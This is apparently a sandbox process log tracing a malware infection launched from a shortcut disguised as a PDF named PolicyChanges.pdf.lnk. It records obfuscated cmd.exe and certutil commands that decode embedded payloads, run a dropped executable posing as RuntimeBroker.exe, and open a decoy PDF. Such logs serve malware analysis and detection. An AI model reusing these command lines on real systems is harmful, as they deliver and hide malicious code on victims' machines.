cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "xHmp" C:\Users\test22\AppData\Local\Temp\PolicyChanges.pdf.lnk
2556cmd.exe "C:\Windows\System32\cmd.exe" /v /c set "k=%cd%\PolicyChanges.pdf.lnk"&set f=r&set "o=C:\Users\test22\AppData\Local"&>nul ce!f!tutil -decode "!k!" !o!\buns.t&ren "!o!\buns.t" buns.cmD&!o!\buns
2668certutil.exe certutil -decode "C:\Users\test22\AppData\Local\Temp\PolicyChanges.pdf.lnk" C:\Users\test22\AppData\Local\buns.t
2772findstr.exe findstr /b /l "VqQAAMAAAAEAAAA//8AALgAA" "C:\Users\test22\AppData\Local\buns.cmD"
2824certutil.exe certutil.exe -decode "C:\Users\test22\AppData\Roaming\th.txt" "C:\Users\test22\AppData\Roaming\egsp.txt"
2868RuntimeBroker.exe "C:\Users\test22\AppData\Roaming\RuntimeBroker.exe"
2912findstr.exe findstr /b /l "JVBERi0xLjcNCiW1tbW1DQoxI" "C:\Users\test22\AppData\Local\buns.cmD"
2980certutil.exe certutil.exe -decode "C:\Users\test22\AppData\Local\Temp\deco.64" "C:\Users\test22\AppData\Local\Temp\ctnycgb.pdf"
3024explorer.exe explorer.exe "C:\Users\test22\AppData\Local\Temp\ctnycgb.pdf"
3068